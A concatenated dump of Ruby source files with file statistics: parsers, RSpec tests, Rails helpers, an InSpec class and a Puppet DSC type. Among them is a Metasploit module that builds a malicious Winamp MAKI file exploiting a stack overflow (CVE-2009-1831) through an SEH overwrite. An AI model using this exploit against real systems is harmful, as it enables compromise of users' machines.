def initialize(_io, _parent = nil, _root = self)
super(_io, _parent, _root)
_read
end
def _read
@str_array = Array.new(3)
(3).times { |i|
@str_array[i] = (@_io.read_bytes(2)).force_encoding("ascii")
}
@pass_str_array = WantsStrs.new(@_io, self, @_root, str_array)
@pass_str_array_calc = WantsStrs.new(@_io, self, @_root, str_array_calc)
self
end
class WantsStrs < Kaitai::Struct::Struct
def initialize(_io, _parent = nil, _root = self, strs)
super(_io, _parent, _root)
@strs = strs
_read
end
def _read
self
end
attr_reader :strs
end
def str_array_calc
return @str_array_calc unless @str_array_calc.nil?
@str_array_calc = ["aB", "Cd"]
@str_array_calc
end
attr_reader :str_array
attr_reader :pass_str_array
attr_reader :pass_str_array_calc
end
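# Minimal read sketch (the input file name is assumed; from_file is provided by
# the Kaitai Struct Ruby runtime):
# parsed = ParamsPassArrayStr.from_file("params_pass_array_str.bin")
# parsed.str_array            # => three 2-byte ASCII strings read from the stream
# parsed.pass_str_array.strs  # => the same array, handed to the child type
# parsed.str_array_calc       # => ["aB", "Cd"]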
| 27.466667 | 112 | 0.685275 |
e9c9101d62c2feffee410eb44a33dc06ec154d55
| 6,749 |
require 'spec_helper'
describe SPACEX::Rockets do
context '#info', vcr: { cassette_name: 'rockets/info' } do
subject do
SPACEX::Rockets.info
end
it "returns all Rockets' when no id is passed info" do
first_subject = subject.first
expect(first_subject.id).to eq 1
expect(first_subject.active).to eq false
expect(first_subject.stages).to eq 2
expect(first_subject.boosters).to eq 0
expect(first_subject.cost_per_launch).to eq 6_700_000
expect(first_subject.success_rate_pct).to eq 40
expect(first_subject.first_flight).to eq '2006-03-24'
expect(first_subject.country).to eq 'Republic of the Marshall Islands'
expect(first_subject.company).to eq 'SpaceX'
expect(first_subject.height).to eq(
'meters' => 22.25,
'feet' => 73
)
expect(first_subject.diameter).to eq(
'meters' => 1.68,
'feet' => 5.5
)
expect(first_subject.mass).to eq(
'kg' => 30_146,
'lb' => 66_460
)
expect(first_subject.payload_weights).to eq [{
'id' => 'leo',
'name' => 'Low Earth Orbit',
'kg' => 450,
'lb' => 992
}]
expect(first_subject.first_stage).to eq(
'reusable' => false,
'engines' => 1,
'fuel_amount_tons' => 44.3,
'burn_time_sec' => 169,
'thrust_sea_level' => {
'kN' => 420,
'lbf' => 94_000
},
'thrust_vacuum' => {
'kN' => 480,
'lbf' => 110_000
}
)
expect(first_subject.second_stage).to eq(
'engines' => 1,
'fuel_amount_tons' => 3.38,
'burn_time_sec' => 378,
'thrust' => {
'kN' => 31,
'lbf' => 7000
},
'payloads' => {
'option_1' => 'composite fairing',
'composite_fairing' => {
'height' => {
'meters' => 3.5,
'feet' => 11.5
},
'diameter' => {
'meters' => 1.5,
'feet' => 4.9
}
}
}
)
expect(first_subject.engines).to eq(
'number' => 1,
'type' => 'merlin',
'version' => '1C',
'layout' => 'single',
'engine_loss_max' => 0,
'propellant_1' => 'liquid oxygen',
'propellant_2' => 'RP-1 kerosene',
'thrust_sea_level' => {
'kN' => 420,
'lbf' => 94_000
},
'thrust_vacuum' => {
'kN' => 480,
'lbf' => 110_000
},
'thrust_to_weight' => 96
)
expect(first_subject.landing_legs).to eq(
'number' => 0,
'material' => nil
)
expect(first_subject.wikipedia).to eq(
'https://en.wikipedia.org/wiki/Falcon_1'
)
expect(first_subject.description).to eq(
'The Falcon 1 was an expendable launch system '\
'privately developed and manufactured by SpaceX during 2006-2009. '\
'On 28 September 2008, Falcon 1 became the first '\
'privately-developed liquid-fuel launch vehicle to '\
'go into orbit around the Earth.'
)
expect(first_subject.rocket_id).to eq 'falcon1'
expect(first_subject.rocket_name).to eq 'Falcon 1'
expect(first_subject.rocket_type).to eq 'rocket'
expect(first_subject.flickr_images).to eq(
[
'https://www.spacex.com/sites/spacex/files/styles/media_gallery_large/public/2009_-_01_liftoff_south_full_wide_ro8a1280_edit.jpg?itok=8loiSGt1',
'https://www.spacex.com/sites/spacex/files/styles/media_gallery_large/public/2009_-_02_default_liftoff_west_full_wide_nn6p2062_xl.jpg?itok=p776nHsM'
]
)
end
end
context "#info('falcon1')", vcr: { cassette_name: 'rockets/info/falcon1' } do
subject do
SPACEX::Rockets.info('falcon1')
end
it 'returns Rocket info for "falcon1"' do
expect(subject.id).to eq 1
expect(subject.active).to eq false
expect(subject.stages).to eq 2
expect(subject.boosters).to eq 0
expect(subject.cost_per_launch).to eq 6_700_000
expect(subject.success_rate_pct).to eq 40
expect(subject.first_flight).to eq '2006-03-24'
expect(subject.country).to eq 'Republic of the Marshall Islands'
expect(subject.company).to eq 'SpaceX'
expect(subject.height).to eq('meters' => 22.25, 'feet' => 73)
expect(subject.diameter).to eq('meters' => 1.68, 'feet' => 5.5)
expect(subject.mass).to eq('kg' => 30_146, 'lb' => 66_460)
expect(subject.payload_weights).to eq [{
'id' => 'leo',
'name' => 'Low Earth Orbit',
'kg' => 450,
'lb' => 992
}]
expect(subject.first_stage).to eq(
'reusable' => false,
'engines' => 1,
'fuel_amount_tons' => 44.3,
'burn_time_sec' => 169,
'thrust_sea_level' => {
'kN' => 420,
'lbf' => 94_000
},
'thrust_vacuum' => {
'kN' => 480,
'lbf' => 110_000
}
)
expect(subject.second_stage).to eq(
'engines' => 1,
'fuel_amount_tons' => 3.38,
'burn_time_sec' => 378,
'thrust' => {
'kN' => 31,
'lbf' => 7000
},
'payloads' => {
'option_1' => 'composite fairing',
'composite_fairing' => {
'height' => {
'meters' => 3.5,
'feet' => 11.5
},
'diameter' => {
'meters' => 1.5,
'feet' => 4.9
}
}
}
)
expect(subject.engines).to eq(
'number' => 1,
'type' => 'merlin',
'version' => '1C',
'layout' => 'single',
'engine_loss_max' => 0,
'propellant_1' => 'liquid oxygen',
'propellant_2' => 'RP-1 kerosene',
'thrust_sea_level' => {
'kN' => 420,
'lbf' => 94_000
},
'thrust_vacuum' => {
'kN' => 480,
'lbf' => 110_000
},
'thrust_to_weight' => 96
)
expect(subject.landing_legs).to eq('number' => 0, 'material' => nil)
expect(subject.wikipedia).to eq 'https://en.wikipedia.org/wiki/Falcon_1'
expect(subject.description).to eq(
'The Falcon 1 was an expendable launch system '\
'privately developed and manufactured by SpaceX during 2006-2009. '\
'On 28 September 2008, Falcon 1 became the first '\
'privately-developed liquid-fuel launch vehicle to '\
'go into orbit around the Earth.'
)
expect(subject.rocket_id).to eq 'falcon1'
expect(subject.rocket_name).to eq 'Falcon 1'
expect(subject.rocket_type).to eq 'rocket'
end
end
end
| 31.985782 | 158 | 0.532375 |
f74c724b5698f41ae81861441e29eea0701122cc
| 1,534 |
require "spec_helper"
describe Mongoid::Persistence::Atomic::PullAll do
describe "#persist" do
context "when the field exists" do
let(:person) do
Person.create(aliases: [ "007" ])
end
let!(:pulled) do
person.pull_all(:aliases, [ "007" ])
end
let(:reloaded) do
person.reload
end
it "pulls the value from the array" do
person.aliases.should be_empty
end
it "persists the data" do
reloaded.aliases.should be_empty
end
it "removes the field from the dirty attributes" do
person.changes["aliases"].should be_nil
end
it "resets the document dirty flag" do
person.should_not be_changed
end
it "returns the new array value" do
pulled.should be_empty
end
end
context "when the field does not exist" do
let(:person) do
Person.create
end
let!(:pulled) do
person.pull_all(:aliases, [ "Bond" ])
end
let(:reloaded) do
person.reload
end
it "does not modify the field" do
person.aliases.should be_nil
end
it "persists no data" do
reloaded.aliases.should be_nil
end
it "removes the field from the dirty attributes" do
person.changes["aliases"].should be_nil
end
it "resets the document dirty flag" do
person.should_not be_changed
end
it "returns nil" do
pulled.should be_nil
end
end
end
end
| 19.666667 | 57 | 0.592568 |
1d5b3478304877016e6b58ee0a83909fd036d691
| 81 |
require_relative 'deployment/tasks'
require_relative 'deployment/set_railman_env'
| 40.5 | 45 | 0.888889 |
d575b94d5e2d034cce6946958dd6631cde6a51d1
| 2,018 |
$:.unshift(File.dirname(__FILE__) + "/../../rails_generators")
require "rubygems"
require 'mongo_mapper_generators'
require "rails_generator"
require 'rails_generator/scripts/generate'
require "fileutils"
web_app_theme_root = File.join(File.dirname(__FILE__), "/../../")
tmp_rails_app_name = "tmp_rails_app"
tmp_rails_app_root = File.join(web_app_theme_root, tmp_rails_app_name)
Rails::Generator::Base.prepend_sources Rails::Generator::PathSource.new(:mongo_mapper_generators, File.join(File.dirname(__FILE__), "..", "..", "rails_generators"))
module GeneratorHelpers
def generate_rails_app
FileUtils.mkdir(File.join(@app_root))
end
def remove_models
FileUtils.rm_rf(File.join(@app_root, "app", "models"))
end
def generate_mongo_model(*args)
options = !args.empty? && args.last.is_a?(Hash) ? args.pop : {}
options.merge!({:destination => @app_root, :quiet => true})
args << options
run_generator(*args)
end
def model_exists?(filename)
File.exists?(File.join(@app_root, "app", "models", filename))
end
def unit_test_exists?(filename)
File.exists?(File.join(@app_root, "test", "unit", filename))
end
# Instantiates the Generator.
def build_generator(name, params, options)
Rails::Generator::Base.instance(name, params, options)
end
# Runs the +create+ command (like the command line does).
def run_generator(name, params=[], options={})
silence_generator do
build_generator(name, params, options).command(:create).invoke!
end
end
# Silences the logger temporarily and returns the output as a String.
def silence_generator
logger_original = Rails::Generator::Base.logger
myout = StringIO.new
Rails::Generator::Base.logger = Rails::Generator::SimpleLogger.new(myout)
yield if block_given?
Rails::Generator::Base.logger = logger_original
myout.string
end
end
Before do
@app_root = tmp_rails_app_root
end
After do
FileUtils.rm_rf(tmp_rails_app_root)
end
World(GeneratorHelpers)
| 29.246377 | 165 | 0.722002 |
f7188845e6adcfdd8a0bcbc98fac9bd8c5bbdce5
| 3,070 |
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Winamp MAKI Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Winamp 5.55. The flaw
exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,
where memmove is used with in a insecure way with user controlled data.
To exploit the vulnerability the attacker must convince the attacker to install the
generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin,
or generate a new skin using the crafted mcvcore.maki file. The module has been
tested successfully on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Monica Sojeong Hong', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2009-1831'],
[ 'OSVDB', '54902'],
[ 'BID', '35052'],
[ 'EDB', '8783'],
[ 'EDB', '8772'],
[ 'EDB', '8770'],
[ 'EDB', '8767'],
[ 'URL', 'http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 4000,
'DisableNops' => true,
'BadChars' => ""
},
'Platform' => 'win',
'Targets' =>
[
# winamp.exe 5.5.5.2405
[ 'Winamp 5.55 / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x12f02bc3, # ppr from in_mod.dll
'Offset' => 16756
}
]
],
'Privileged' => false,
'DisclosureDate' => 'May 20 2009',
'DefaultTarget' => 0))
deregister_options('FILENAME')
end
def file_format_filename
'mcvcore.maki'
end
def exploit
sploit = rand_text(target['Offset'])
sploit << generate_seh_record(target.ret)
sploit << payload.encoded
length_sploit = [sploit.length].pack("v")
header = "\x46\x47" # magic
header << "\x03\x04" # version
header << "\x17\x00\x00\x00"
types = "\x01\x00\x00\x00" # count
# class 1 => Object
types << "\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5\x32\x35\xF3\xE7"
# functions
functions = "\x37\x00\x00\x00" # count
#function 1
functions << "\x01\x01" # class
functions << "\x00\x00" # dummy
functions << length_sploit # function name length
functions << sploit # crafted function name
maki = header
maki << types
maki << functions
print_status("Creating '#{file_format_filename}' file ...")
file_create(maki)
end
end
| 28.165138 | 100 | 0.600651 |
b979c1a2e41659f6d7932aec83e316bfb8057e4c
| 1,012 |
# frozen_string_literal: true
# K8s Inspec Backend Classes
#
# Based on the GCP Inspec classes
#
require 'json'
# Base class for K8s resources - depends on train K8s transport for connection
class K8sResourceBase < Inspec.resource(1)
attr_reader :opts, :k8s, :item, :count
def initialize(opts)
@opts = opts
@k8s = inspec.backend
@count = item.length if item.respond_to? :length
end
def failed_resource?
@failed_resource
end
# Intercept K8s client exceptions
def catch_k8s_errors
yield
# create custom messages as needed
rescue K8s::Error::Conflict => e
error = JSON.parse(e.body)
fail_resource error['error']['message']
@failed_resource = true
nil
rescue K8s::Error::NotFound => e
error = JSON.parse(e.body)
fail_resource error['error']['message']
@failed_resource = true
nil
rescue Excon::Error::Socket => e
error = JSON.parse(e.body)
fail_resource error['error']['message']
@failed_resource = true
nil
end
end
| 22.488889 | 78 | 0.686759 |
187d9f9ee4cb74452216da9fca0d244fcecd22b7
| 1,111 |
require File.expand_path('../boot', __FILE__)
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module Arrr
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# Do not swallow errors in after_commit/after_rollback callbacks.
config.active_record.raise_in_transactional_callbacks = true
end
end
| 41.148148 | 99 | 0.732673 |
875a0cd4a8be9b7a1cda5bfd610620199e74ed61
| 392 |
# encoding: utf-8
module PlatformHelpers
def debian?
family == 'debian'
end
def ubuntu?
family == 'ubuntu'
end
def centos?
family == 'redhat' && %w(5.9 6.4 6.5).include?(release)
end
def fedora?
family == 'fedora'
end
private
def family
RSpec.configuration.os[:family].downcase
end
def release
RSpec.configuration.os[:release]
end
end
| 13.066667 | 59 | 0.627551 |
b945d3ead35b276975c659791f53c401a110bbba
| 237 |
require 'acts_as_indexed'
begin
Refinery::Resource.class_eval do
# Docs for acts_as_indexed http://github.com/dougal/acts_as_indexed
acts_as_indexed :fields => [:file_name, :title, :type_of_content]
end
rescue NameError
end
| 23.7 | 71 | 0.767932 |
7a0dc3a9791f7df12a6b526feab14883da495706
| 350 |
class ApplicationController < ActionController::Base
rescue_from Pundit::NotAuthorizedError, with: :user_not_authorized
include Pundit
protect_from_forgery with: :exception
before_action :authenticate_user!
private
def user_not_authorized
flash[:alert] = "Access Denied"
redirect_to(request.referrer || root_path)
end
end
| 23.333333 | 68 | 0.777143 |
d5a33007119aa8183868376d9ae37c582d1d2ebf
| 407 |
module EventsHelper
def stringPad(str)
str = "0" + str.to_s if str.to_s.size == 1
return str.to_s
end
def to_google_calendar(timeObj)
timeObj = timeObj.utc
dateStr = timeObj.year.to_s
dateStr += stringPad(timeObj.month)
dateStr += stringPad(timeObj.day)
dateStr += "T" + stringPad(timeObj.hour)
dateStr += stringPad(timeObj.min) + "00Z"
return dateStr
end
end
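# Worked example (illustrative): to_google_calendar emits the compact UTC stamp
# used in Google Calendar template links, zero-padding single-digit fields:
#   to_google_calendar(Time.utc(2020, 1, 2, 3, 4))  # => "20200102T030400Z"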
| 18.5 | 44 | 0.665848 |
03a61cc7d31716f1ba3ae58fd48c4cdfce1ed6df
| 299 |
class Definition
attr_reader(:definition)
@@definitions = []
def initialize(attributes)
@definition = attributes.fetch(:definition)
end
def self.all
@@definitions
end
def save
@@definitions.push(self.definition)
end
def self.clear
@@definitions = []
end
end
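# Minimal usage sketch (illustrative). Note that #save pushes the definition
# string itself, so Definition.all returns strings rather than Definition objects.
if $PROGRAM_NAME == __FILE__
  entry = Definition.new(definition: "A statement of the exact meaning of a word")
  entry.save
  puts Definition.all.inspect  # => ["A statement of the exact meaning of a word"]
  Definition.clear
end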
| 13.590909 | 47 | 0.668896 |
f870c6e137b2e722da97154bd98470ae026ff1a0
| 22,180 |
require 'pathname'
Puppet::Type.newtype(:dsc_spdistributedcacheclientsettings) do
require Pathname.new(__FILE__).dirname + '../../' + 'puppet/type/base_dsc'
require Pathname.new(__FILE__).dirname + '../../puppet_x/puppetlabs/dsc_type_helpers'
@doc = %q{
The DSC SPDistributedCacheClientSettings resource type.
Automatically generated from
'SharePointDsc/DSCResources/MSFT_SPDistributedCacheClientSettings/MSFT_SPDistributedCacheClientSettings.schema.mof'
To learn more about PowerShell Desired State Configuration, please
visit https://technet.microsoft.com/en-us/library/dn249912.aspx.
For more information about built-in DSC Resources, please visit
https://technet.microsoft.com/en-us/library/dn249921.aspx.
For more information about xDsc Resources, please visit
https://github.com/PowerShell/DscResources.
}
validate do
fail('dsc_issingleinstance is a required attribute') if self[:dsc_issingleinstance].nil?
end
def dscmeta_resource_friendly_name; 'SPDistributedCacheClientSettings' end
def dscmeta_resource_name; 'MSFT_SPDistributedCacheClientSettings' end
def dscmeta_module_name; 'SharePointDsc' end
def dscmeta_module_version; '2.2.0.0' end
newparam(:name, :namevar => true ) do
end
ensurable do
newvalue(:exists?) { provider.exists? }
newvalue(:present) { provider.create }
defaultto { :present }
end
# Name: PsDscRunAsCredential
# Type: MSFT_Credential
# IsMandatory: False
# Values: None
newparam(:dsc_psdscrunascredential) do
def mof_type; 'MSFT_Credential' end
def mof_is_embedded?; true end
desc "PsDscRunAsCredential"
validate do |value|
unless value.kind_of?(Hash)
fail("Invalid value '#{value}'. Should be a hash")
end
PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("Credential", value)
end
end
# Name: IsSingleInstance
# Type: string
# IsMandatory: True
# Values: ["Yes"]
newparam(:dsc_issingleinstance) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "IsSingleInstance - Unique key for the resource. Set to 'Yes' to apply configuration. Valid values are Yes."
isrequired
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
unless ['Yes', 'yes'].include?(value)
fail("Invalid value '#{value}'. Valid values are Yes")
end
end
end
# Name: DLTCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dltcmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DLTCMaxConnectionsToServer - Maximum number of connections to the Distributed Logon Token Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DLTCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dltcrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DLTCRequestTimeout - Request timeout for the Distributed Logon Token Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DLTCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dltcchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DLTCChannelOpenTimeOut - Channel timeout for the Distributed Logon Token Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DVSCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dvscmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DVSCMaxConnectionsToServer - Maximum number of connections to the Distributed View State Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DVSCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dvscrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DVSCRequestTimeout - Request timeout for the Distributed View State Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DVSCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dvscchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DVSCChannelOpenTimeOut - Channel timeout for the Distributed View State Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DACMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dacmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DACMaxConnectionsToServer - Maximum number of connections to the Distributed Access Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DACRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dacrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DACRequestTimeout - Request timeout for the Distributed Access Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DACChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dacchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DACChannelOpenTimeOut - Channel timeout for the Distributed Access Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DAFMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dafmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DAFMaxConnectionsToServer - Maximum number of connections to the Distributed Activity Feed Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DAFRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dafrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DAFRequestTimeout - Request timeout for the Distributed Activity Feed Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DAFChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dafchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DAFChannelOpenTimeOut - Channel timeout for the Distributed Activity Feed Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DAFCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dafcmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DAFCMaxConnectionsToServer - Maximum number of connections to the Distributed Activity Feed LMT Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DAFCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dafcrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DAFCRequestTimeout - Request timeout for the Distributed Activity Feed LMT Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DAFCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dafcchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DAFCChannelOpenTimeOut - Channel timeout for the Distributed Activity Feed LMT Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DBCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dbcmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DBCMaxConnectionsToServer - Maximum number of connections to the Distributed Bouncer Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DBCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dbcrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DBCRequestTimeout - Request timeout for the Distributed Bouncer Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DBCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dbcchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DBCChannelOpenTimeOut - Channel timeout for the Distributed Bouncer Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DDCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_ddcmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DDCMaxConnectionsToServer - Maximum number of connections to the Distributed Default Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DDCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_ddcrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DDCRequestTimeout - Request timeout for the Distributed Default Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DDCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_ddcchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DDCChannelOpenTimeOut - Channel timeout for the Distributed Default Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DSCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dscmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DSCMaxConnectionsToServer - Maximum number of connections to the Distributed Search Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DSCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dscrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DSCRequestTimeout - Request timeout for the Distributed Search Cache"
validate do |value|
